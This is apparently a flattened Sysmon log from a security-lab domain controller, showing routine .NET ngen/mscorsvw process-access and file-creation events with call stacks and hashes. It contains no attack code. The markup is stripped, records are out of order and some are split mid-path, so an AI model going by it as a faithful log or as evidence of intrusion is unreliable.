21:07:19.061{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A287-60D3-DC05-00000000CF01}6372C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023715Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:19.045{4DB9351A-A287-60D3-DB05-00000000CF01}2648NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\L52ASFZSAH\System.Management.Instrumentation.ni.dll.auxMD5=C365006CDCF282F093F169FB04BCF9C5,SHA256=91E1017640C1F840770D801DC44DF3361F0CDAB319F484CCC80DA0829853B5A3,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x800000000000000023714Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:19.045{4DB9351A-A287-60D3-DB05-00000000CF01}2648NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\L52ASFZSAH\System.Management.Instrumentation.ni.dllMD5=AB09E95598E689D527E3EA9892DF52AF,SHA256=AD948DD22319931AB4C9ED152C8225E1604A632C4A549225087F623F9AEF1045,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023713Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:19.030{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A287-60D3-DB05-00000000CF01}2648C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023712Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:18.998{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A287-60D3-DB05-00000000CF01}2648C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023711Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:07:18.998{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A287-60D3-DB05-00000000CF01}2648C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023710Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:18.998{4DB9351A-A285-60D3-DA05-00000000CF01}6304NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\ZNBGT32ZZE\System.Management.Automation.ni.dll.auxMD5=9EDFB514BCDB548D5483D8605A50DD41,SHA256=905523FA1B622CC8E76919F3EB7AD14E3D8C26CCD18825C71E160920C438FA13,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x800000000000000023709Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:18.998{4DB9351A-A285-60D3-DA05-00000000CF01}6304NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\ZNBGT32ZZE\System.Management.Automation.ni.dllMD5=D3ACE06BFAE60AFA5674AD4E4B84E2F3,SHA256=79B5DB1CE2EE53CFDB86234CD29438799A9A3E2C56963A7E430FE864A2915366,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023848Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:20.967{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A288-60D3-F405-00000000CF01}6568C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023847Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:07:20.967{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A288-60D3-F405-00000000CF01}6568C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023846Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:20.967{4DB9351A-A288-60D3-F305-00000000CF01}4864NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\VP8KFPLKHZ\System.ComponentModel.DataAnnotations.ni.dll.auxMD5=D149C73DF08CF42F5F8290A92ABE9315,SHA256=7F58231EC746EF7ACACEAF2E772D9117196308C2D9F6344BC39E5EE07820764E,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x800000000000000023845Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:20.967{4DB9351A-A288-60D3-F305-00000000CF01}4864NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\VP8KFPLKHZ\System.ComponentModel.DataAnnotations.ni.dllMD5=0F83E7236832F4C9A74FDA03467B133F,SHA256=E7616DE770B55F2EE7575AC003BA9ACA9CEF79F0B6444522ED1AD836405EBD06,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023844Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:20.920{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A288-60D3-F305-00000000CF01}4864C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023843Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:20.905{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A288-60D3-F305-00000000CF01}4864C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023842Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:07:20.905{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A288-60D3-F305-00000000CF01}4864C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023841Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:20.905{4DB9351A-A288-60D3-F205-00000000CF01}4388NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\AH8KR827TP\System.Web.DataVisualization.Design.ni.dll.auxMD5=DF2BF6BA3AC3F817DE10103F3B86BF21,SHA256=59992D9C440D67C2F6BD3915CB8C19925D94A8D47C0125F2B5907456D3BC5810,IMPHASH=00000000000000000000000000000000falsetrue 
ft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023786Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:19.998{4DB9351A-A287-60D3-E805-00000000CF01}6228NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\2HY8FXGBBJ\System.ServiceModel.Channels.ni.dll.auxMD5=DCED632E66C4D799A94BEBAD939226DA,SHA256=8D8E04992F318C42501098DD7BE0F6DC178F4CFDD862F88FB89B64893CEFF722,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023785Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:19.998{4DB9351A-A287-60D3-E805-00000000CF01}6228NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\2HY8FXGBBJ\System.ServiceModel.Channels.ni.dllMD5=6BFA0D7D6BB164DA9A776DCADB96E235,SHA256=97F15EFF7DAB6ECD25130FDC10F2A84C69BC67E12DB5494C1491D6EAFE0869AD,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023894Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:21.717{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A289-60D3-FC05-00000000CF01}5592C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x800000000000000023893Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:21.686{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A289-60D3-FC05-00000000CF01}5592C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023892Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:21.686{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A289-60D3-FC05-00000000CF01}5592C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Micro
soft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023891Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:21.670{4DB9351A-A289-60D3-FB05-00000000CF01}2932NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\KP9338WXGM\System.Web.RegularExpressions.ni.dll.auxMD5=018717FFF06A4E8F477A0E99864F8CE0,SHA256=31BB6187BA2D5EABFDED51F2D3DE7801B7D7E39890232384856DB39C9C578BBF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023890Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:21.670{4DB9351A-A289-60D3-FB05-00000000CF01}2932NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\KP9338WXGM\System.Web.RegularExpressions.ni.dllMD5=4E936BFA5621B1AF5D44A202DDA7F8BD,SHA256=632645D27980B291628D85D6E7E24B837DCE111602D7BEA0F12EA4C9E1F9C81D,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023889Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:21.623{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A289-60D3-FB05-00000000CF01}2932C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x800000000000000023888Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:21.608{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A289-60D3-FB05-00000000CF01}2932C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023887Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:21.608{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A289-60D3-FB05-00000000CF01}2932C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Micro
soft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023886Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:21.608{4DB9351A-A289-60D3-FA05-00000000CF01}6532NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\INH6O9CPDB\System.Web.Mobile.ni.dll.auxMD5=FE21FC921736AB97D2CE58ED17543ED0,SHA256=09603FD2CB964909BE4D93EC28E7EC02F217C0AAB835AA3B285136E8A505A155,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023885Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:21.608{4DB9351A-A289-60D3-FA05-00000000CF01}6532NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\INH6O9CPDB\System.Web.Mobile.ni.dllMD5=06B0D3889FAB4AFFF9CCBBEC4AEDBD55,SHA256=220DC68D0EB961A5F94860BCBA485077180F5115A78DABAA1330D13406EB0468,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023884Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:21.467{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A289-60D3-FA05-00000000CF01}6532C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x800000000000000023883Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:21.451{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A289-60D3-FA05-00000000CF01}6532C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023882Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 